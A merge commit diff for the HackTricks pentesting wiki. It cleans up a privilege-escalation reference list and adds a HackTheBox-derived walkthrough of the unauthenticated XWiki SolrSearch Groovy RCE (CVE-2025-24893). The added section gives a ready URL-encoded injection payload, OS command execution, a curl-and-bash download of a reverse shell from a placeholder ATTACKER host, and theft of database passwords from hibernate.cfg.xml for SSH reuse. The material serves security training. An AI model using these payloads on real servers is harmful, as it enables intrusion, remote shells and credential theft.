Merge pull request #1642 from HackTricks-wiki/update_HackTheBox_Editor__Unauthenticated_XWiki_Groovy_RC_20251206_182906

HackTheBox Editor Unauthenticated XWiki Groovy RCE (CVE-2025...

Author: carlospolop

src/linux-hardening/privilege-escalation/README.md

@@ -1798,8 +1798,6 @@ vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md
 - [0xdf – HTB Planning (Crontab UI privesc, zip -P creds reuse)](https://0xdf.gitlab.io/2025/09/13/htb-planning.html)
 - [0xdf – HTB Era: forged .text_sig payload for cron-executed monitor](https://0xdf.gitlab.io/2025/11/29/htb-era.html)
 - [alseambusher/crontab-ui](https://github.com/alseambusher/crontab-ui)
-
-
 - [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
 - [https://payatu.com/guide-linux-privilege-escalation/](https://payatu.com/guide-linux-privilege-escalation/)
 - [https://pen-testing.sans.org/resources/papers/gcih/attack-defend-linux-privilege-escalation-techniques-2016-152744](https://pen-testing.sans.org/resources/papers/gcih/attack-defend-linux-privilege-escalation-techniques-2016-152744)
@@ -1820,7 +1818,6 @@ vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md
 - [0xdf – HTB Eureka (bash arithmetic injection via logs, overall chain)](https://0xdf.gitlab.io/2025/08/30/htb-eureka.html)
 - [GNU Bash Manual – BASH_ENV (non-interactive startup file)](https://www.gnu.org/software/bash/manual/bash.html#index-BASH_005fENV)
 - [0xdf – HTB Environment (sudo env_keep BASH_ENV → root)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
-
 - [NVISO – You name it, VMware elevates it (CVE-2025-41244)](https://blog.nviso.eu/2025/09/29/you-name-it-vmware-elevates-it-cve-2025-41244/)
 
 {{#include ../../banners/hacktricks-training.md}}

src/pentesting-web/ssti-server-side-template-injection/README.md

@@ -462,6 +462,19 @@ this.evaluate(new String(java.util.Base64.getDecoder().decode("QGdyb292eS50cmFuc
 this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 114, 97, 110, 115, 102, 111, 114, 109, 46, 65, 83, 84, 84, 101, 115, 116, 40, 118, 97, 108, 117, 101, 61, 123, 97, 115, 115, 101, 114, 116, 32, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101, 46, 103, 101, 116, 82,117, 110, 116, 105, 109, 101, 40, 41, 46, 101, 120, 101, 99, 40, 34, 105, 100, 34, 41, 125, 41, 100, 101, 102, 32, 120}))
 ```
 
+#### XWiki SolrSearch Groovy RCE (CVE-2025-24893)
+
+XWiki ≤ 15.10.10 (fixed in 15.10.11 / 16.4.1 / 16.5.0RC1) renders unauthenticated RSS search feeds through the `Main.SolrSearch` macro. The handler takes the `text` query parameter, wraps it in wiki syntax and evaluates macros, so injecting `}}}` followed by `{{groovy}}` executes arbitrary Groovy in the JVM.
+
+1. **Fingerprint & scope** – When XWiki is reverse-proxied behind host-based routing, fuzz the `Host` header (`ffuf -u http://<ip> -H "Host: FUZZ.target" ...`) to discover the wiki vhost, then browse `/xwiki/bin/view/Main/` and read the footer (`XWiki Debian 15.10.8`) to pin the vulnerable build.
+2. **Trigger SSTI** – Request `/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22Hello%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. The RSS item `<title>` will contain the Groovy output. Always “URL-encode all characters” so spaces stay as `%20`; replacing them with `+` makes XWiki throw HTTP 500.
+3. **Run OS commands** – Swap the Groovy body for `{{groovy}}println("id".execute().text){{/groovy}}`. `String.execute()` spawns the command directly with `execve()`, so shell metacharacters (`|`, `>`, `&`) are not interpreted. Use a download-and-execute pattern instead:
+   - `"curl http://ATTACKER/rev -o /dev/shm/rev".execute().text`
+   - `"bash /dev/shm/rev".execute().text` (the script holds the reverse shell logic).
+4. **Post exploitation** – XWiki stores database credentials in `/etc/xwiki/hibernate.cfg.xml`; leaking `hibernate.connection.password` gives real-system passwords that can be reused over SSH. If the service unit sets `NoNewPrivileges=true`, tools such as `/bin/su` will not gain additional privileges even with valid passwords, so pivot via SSH instead of relying on local SUID binaries.
+
+The same payload works on `/xwiki/bin/get/Main/SolrSearch`, and the Groovy stdout is always embedded in the RSS title, so it is easy to script enumeration of commands.
+
 ### Other Java
 
 <figure><img src="../../images/image (7).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*NHgR25-CMICMhPOaIJzqwQ.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*NHgR25-CMICMhPOaIJzqwQ.jpeg</a></p></figcaption></figure>
@@ -1135,10 +1148,12 @@ If you think it could be useful, read:
 https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt
 {{#endref}}
 
-## Practice & References
+## References
 
 - [https://portswigger.net/web-security/server-side-template-injection/exploiting](https://portswigger.net/web-security/server-side-template-injection/exploiting)
 - [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
 - [https://portswigger.net/web-security/server-side-template-injection](https://portswigger.net/web-security/server-side-template-injection)
+- [0xdf – HTB: Editor (XWiki SolrSearch Groovy RCE → Netdata ndsudo privesc)](https://0xdf.gitlab.io/2025/12/06/htb-editor.html)
+- [XWiki advisory – `SolrSearch` RSS Groovy RCE (GHSA-rr6p-3pfg-562j / CVE-2025-24893)](https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j)
 
 {{#include ../../banners/hacktricks-training.md}}